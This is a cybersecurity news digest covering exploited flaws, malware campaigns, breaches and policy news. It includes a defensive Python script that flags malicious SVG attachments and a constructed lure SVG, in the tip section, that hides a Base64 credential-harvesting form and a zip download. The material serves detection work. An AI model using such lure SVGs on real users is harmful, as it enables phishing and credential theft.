Cyber Briefing: 2025.09.05
SAP flaw exploited, SVG & AMOS malware spread, APT28 Outlook backdoor, Bridgestone cyberattack, NK fake interviews, Salesforce vendor breach, US allies push SBOMs, $10M FSB bounty, DOJ sues toy maker.
👉 What are the latest cybersecurity alerts, incidents, and news?
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
🚨 Cyber Alerts
1. SAP S/4HANA Exploited Vulnerability
A new and critical command injection vulnerability in SAP S/4HANA, tracked as CVE-2025-42957, is being actively exploited in the wild. This flaw could allow attackers with low-level user privileges to fully compromise affected systems, leading to data theft, fraud, and a complete subversion of business processes.
2. VirusTotal Finds Undetected SVG Files
A new malware campaign is using malicious Scalable Vector Graphics (SVG) files disguised as official documents from the Colombian judicial system to trick users into downloading a ZIP file. In a separate, but related, development, another new campaign is targeting macOS users with a different information-stealing malware called AMOS, which is distributed through pirated software and uses deceptive tactics to bypass Apple's security protections.
3. Russian APT28 Deploys Outlook Backdoor
A state-sponsored Russian hacking group known as APT28 has been linked to a new Microsoft Outlook backdoor called NotDoor, which allows attackers to steal data and execute commands on a victim's computer. The malware, delivered through a DLL side-loading technique, monitors incoming emails for a specific trigger word, enabling data exfiltration and command execution.
💥 Cyber Incidents
4. Bridgestone Confirms Cyberattack
Bridgestone, the world's largest tire manufacturer, has confirmed that it is investigating a cyberattack that has disrupted operations at some of its North American manufacturing facilities. The company believes its rapid response contained the incident, preventing any theft of customer data.
5. North Korean Hackers Fake Interviews
North Korean hackers have been using fake cryptocurrency job interviews to target at least 230 individuals, infecting their systems with malware through a fraudulent skill assessment website. The attacks, part of the "Contagious Interview" campaign, involve the attackers impersonating various finance entities and using a technique called ClickFix to trick victims into executing malicious commands.
6. Cybersecurity Firms Hit By Breach
Proofpoint, SpyCloud, Tanium, and Tenable have confirmed that their Salesforce instances were compromised in the recent Salesforce–Salesloft Drift attack, which exploited a third-party AI chatbot's integration to steal sensitive data. The attackers used compromised OAuth tokens to access information from hundreds of organizations.
📢 Cyber News
7. US Allies Push For SBOMs In Security
Twenty-two government agencies from the US and 14 allied countries have jointly released a guide advocating for the widespread adoption of Software Bills of Materials (SBOMs) to enhance software supply chain security. The guidance highlights how using SBOMs improves security and reduces risks and costs by providing clear visibility into the components of software, which is crucial for identifying and addressing vulnerabilities quickly.
8. Reward For Russian FSB Hackers
The U.S. Department of State is offering a reward of up to $10 million for information on three Russian FSB officers—Pavel Akulov, Mikhail Gavrilov, and Marat Tyukov—who are accused of orchestrating a widespread hacking campaign against U.S. and international critical infrastructure. The officers are alleged to be part of the FSB's Center 16 unit, which has been linked to numerous cyberattacks on energy firms and government agencies worldwide since at least 2012.
9. US Sues Robot Toy Maker Over Data
The U.S. Department of Justice has sued toy maker Apitor Technology for allegedly allowing a Chinese third party to collect children's geolocation data through its app without parental consent, violating the Children's Online Privacy Protection Rule (COPPA). A proposed settlement would require Apitor to pay a $500,000 penalty and comply with COPPA regulations, though the fine will be suspended due to the company's financial state.
📈 Cyber Stocks
As trading opened on Friday, September 5, 2025, cybersecurity stocks traded cautiously as investors braced for a key U.S. jobs report and potential shifts in Fed policy amid geopolitical jitters.
Radware (RDWR) closed steady, with modest movement reflecting investor confidence supported by recent analyst upgrades from Jefferies and Barclays, even as valuation concerns persisted.
CrowdStrike (CRWD) held near recent levels, as markets balanced cautious reactions to mixed near-term guidance with confidence in its ARR growth and AI-driven platform strength.
Check Point Software Technologies (CHKP) settled around $190, maintaining stability as investors favored its strong fundamentals, steady margins, and position near its 52-week high.
Rapid7 (RPD) ended slightly lower, pressured by Morgan Stanley lowering its price target to $22 and continued technical weakness signaling bearish momentum.
SentinelOne (S) finished higher, supported by positive analyst sentiment, new institutional buying from Atreides Management, and optimism surrounding its AI and endpoint security growth.
💡 Cyber Tip
🖼️ Malicious SVG Files Evade Detection to Deliver Phishing Payloads
Researchers have uncovered a phishing campaign that uses weaponized SVG files disguised as Colombian judicial documents. These files contain hidden JavaScript that decodes a Base64 phishing page and secretly downloads a ZIP file in the background. VirusTotal confirmed that 44 such SVG samples bypassed antivirus detection, making them especially dangerous.
At the same time, a separate campaign is targeting macOS users with Atomic macOS Stealer (AMOS), distributed via pirated software downloads. Attackers trick victims into running Terminal commands to bypass Apple’s Gatekeeper protections. Once installed, AMOS can steal browser data, crypto wallets, credentials, and even files from common folders.
✅ What you should do
Do not open unexpected SVG attachments in emails, even if they appear official
Educate staff about malicious file formats beyond PDFs and Office docs
Use sandboxing and advanced threat detection tools for unusual file types
Only download macOS apps from the App Store or verified developers
Never run commands from pirated or cracked software prompts
Enable Apple’s Lockdown Mode or other hardened settings if you are a high-risk user
🔒 Why this matters
Attackers are weaponizing overlooked file types like SVG and abusing social engineering to bypass security features. These campaigns highlight how malware can blend into everyday workflows, from legal-looking attachments to fake free apps. Vigilance and advanced detection are essential to stop threats that evade traditional antivirus.
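The indicators described in this tip (an inline script inside the SVG, a Base64 blob that decodes to a phishing page, and a background archive download) are all visible statically, so a mail gateway or sandbox pre-filter can flag them before the file ever reaches a browser. The following triage script is an added example written for this briefing, not code from the researchers or from VirusTotal. It parses an SVG with the standard library, counts script elements, event-handler attributes, `javascript:` links and `foreignObject` wrappers, and decodes any long Base64 run to check whether it contains HTML or references an archive. The sample SVG and the decoded "phishing page" inside it are constructed for the demonstration and do not reproduce the real campaign's files.

```python
"""Static triage of SVG attachments for the indicators discussed above."""
import base64
import re
import xml.etree.ElementTree as ET

# A run of 40+ Base64 characters is unlikely in a benign drawing's geometry.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)
# Script-side helpers typically used to unpack a hidden payload.
DECODER_HINTS = ("atob(", "fromCharCode", "unescape(", "decodeURIComponent(")
# Markers in a decoded blob that point at a phishing page or a dropped archive.
PAYLOAD_MARKERS = (b"<html", b"<form", b"<script", b".zip", b"download")


def _local(name: str) -> str:
    """Strip an XML namespace prefix such as {http://www.w3.org/2000/svg}."""
    return name.rsplit("}", 1)[-1]


def analyze_svg(svg_text: str) -> dict:
    """Return counts of active-content features plus any decoded payloads."""
    findings = {
        "script_elements": 0,
        "decoder_hints": [],
        "event_handlers": [],
        "javascript_hrefs": 0,
        "foreign_objects": 0,
        "decoded_payloads": [],
        "verdict": "clean",
    }
    root = ET.fromstring(svg_text)
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings["script_elements"] += 1
            body = el.text or ""
            findings["decoder_hints"].extend(h for h in DECODER_HINTS if h in body)
        elif tag == "foreignObject":
            findings["foreign_objects"] += 1
        for attr, value in el.attrib.items():
            name = _local(attr)
            if EVENT_ATTR.match(name):
                findings["event_handlers"].append(name)
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings["javascript_hrefs"] += 1

    # Scan the raw text so blobs hidden in attributes or CDATA are covered alike.
    for m in B64_RUN.finditer(svg_text):
        core = m.group(0).rstrip("=")
        core += "=" * (-len(core) % 4)  # restore padding the author may have dropped
        try:
            decoded = base64.b64decode(core, validate=True)
        except ValueError:  # binascii.Error is a ValueError: not real Base64
            continue
        hits = [mk.decode() for mk in PAYLOAD_MARKERS if mk in decoded.lower()]
        if hits:
            findings["decoded_payloads"].append(
                {"offset": m.start(), "length": len(core), "markers": hits}
            )

    active = (findings["script_elements"] or findings["event_handlers"]
              or findings["javascript_hrefs"] or findings["foreign_objects"])
    if active and findings["decoded_payloads"]:
        findings["verdict"] = "malicious"
    elif active or findings["decoded_payloads"]:
        findings["verdict"] = "suspicious"
    return findings


# Constructed sample modelled on the described lure (not a real capture):
# a "judicial notice" SVG whose script decodes a hidden HTML login page that
# also references an archive for download.
_PHISH_PAGE = (
    b"<html><body><form action='https://portal.example.invalid/login'>"
    b"<input name='user'><input name='pass' type='password'></form>"
    b"<a href='notificacion.zip' download>Descargar</a></body></html>"
)
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="600" height="800">
  <text x="20" y="40">Notificacion Judicial</text>
  <script><![CDATA[
    var p = "%s";
    document.write(atob(p));
  ]]></script>
</svg>""" % base64.b64encode(_PHISH_PAGE).decode()

# Constructed benign control: plain vector art with no active content.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="#3366cc"/>
  <text x="10" y="95">Logo</text>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_SVG), ("benign", BENIGN_SVG)):
        print(label, analyze_svg(doc))
```

Running the module prints a "malicious" verdict for the constructed sample (one script element, an `atob(` decoder hint, and a decoded blob containing `<html`, `<form`, `.zip` and `download`) and "clean" for the control. The verdict is deliberately conservative: any script, handler or `foreignObject` alone is only "suspicious", because legitimate interactive SVGs exist; it is the combination of active content with an embedded page or archive reference that matches the pattern in this campaign and warrants quarantine.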
📚 Cyber Review
Join us for a new edition of Cyber Review featuring Melissa Lukings, author of Understanding Cybersecurity Law and Digital Privacy. In this discussion, Lukings explores how law and technology meet in the fast-changing world of data protection and cybersecurity.
Many lawyers struggle with the technical side of cybersecurity, while many security professionals are unaware of legal requirements. Lukings helps bridge this gap by making complex ideas clear and accessible for legal teams, security experts, businesses, and the public.
She shares what inspired her to write the book, real-world challenges she has studied, and practical guidance for professionals working to protect sensitive information.
Tune in to learn how legal and technical communities can work together to safeguard data and build trust.
Be sure to like, comment, and subscribe for more episodes of Cyber Review.
That concludes today’s briefing. You can check the top headlines here!
Copyright © 2025 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on:
Substack, LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.